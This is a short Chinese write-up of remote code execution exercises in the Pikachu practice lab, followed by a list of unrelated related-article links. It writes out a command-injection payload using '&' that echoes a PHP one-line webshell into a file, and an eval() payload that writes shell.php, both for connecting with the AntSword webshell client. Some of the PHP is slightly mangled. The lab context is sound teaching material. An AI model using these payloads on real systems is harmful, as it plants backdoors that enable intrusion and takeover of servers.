Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
裤兜里有钱4 分钟前
关于Xshell连接虚拟机Linux失败的主要原因
linux·运维·服务器
有毒的教程16 分钟前
Ansible批量操作自动化完整教程:批量部署服务、配置同步、软件更新实战
运维·自动化·ansible
辞旧 lekkk25 分钟前
CMake工程指南(一)
linux·运维·服务器·开发语言·qt·学习·萌新
凤年徐30 分钟前
哪些远程办公软件支持多屏协作?2026年7月远程办公工具横评:UU远程成首选,多屏协作、大文件传输等实用功能拉满
服务器
oushaojun230 分钟前
deepseek教我什么是docker
运维·docker·容器
数据知道35 分钟前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
humors22139 分钟前
【转帖】关于防范AI编程工具Claude Code安全后门隐患的风险提示
网络·安全·ai编程
jieyucx44 分钟前
Windows11 & Linux 环境Docker部署与镜像拉取效率优化实战指南
linux·运维·docker
Junsir大斗师44 分钟前
keepalived实现ubuntu22服务器高可用
运维·ubuntu·iptables·keepalived·二层透明网桥
AC赳赳老秦1 小时前
Excel 动态仪表盘制作:用 OpenClaw 自动处理数据、生成交互式图表并实时更新仪表盘
大数据·服务器·后端·测试用例·excel·deepseek·openclaw